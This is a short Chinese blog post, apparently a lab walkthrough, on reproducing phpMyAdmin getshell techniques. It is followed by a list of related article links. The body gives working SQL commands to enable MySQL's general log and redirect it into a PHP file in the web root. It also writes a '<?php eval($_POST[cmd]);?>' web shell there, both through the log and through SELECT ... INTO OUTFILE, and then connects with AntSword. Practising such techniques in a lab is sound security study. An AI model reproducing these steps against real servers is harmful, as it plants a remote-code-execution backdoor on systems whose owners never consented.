PhPMyadmin-cms漏洞复现

cr.sheeper2024-12-29 20:11

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码

show global variables like '%general%';

复制代码

set global general_log='on'; //⽇志保存状态开启；

复制代码

set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置

复制代码

show global variables like '%general%';

复制代码

select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码

select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

上一篇：PDF书籍《手写调用链监控APM系统-Java版》第5章插桩插件与bytebuddy字节码增强

下一篇：应用层2——FTP文件传输协议

热门推荐

01GitHub 镜像站点 022026 年 AI 编程工具终极横评：Cursor vs Claude Code vs Copilot vs Windsurf 03Codex 下载安装指南：Windows 和 macOS 官方版下载 04【AI】2026 年具身智能模型和世界模型总结 05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用，怎么排查和修复 06【踩坑记录 | 第一篇】微软商店无法使用时，如何手动安装 OpenAI Codex？附`.msix`文件系统错误解决方法 07CC-Switch 下载、安装与使用配置指南【2026.5.29】08CC-Switch & Claude 基于 Linux 服务器安装使用指南 09Codex 接入 DeepSeek API 完整配置文档 10裂开！ChatGPT 居然开始要手机号验证，附详细解决方法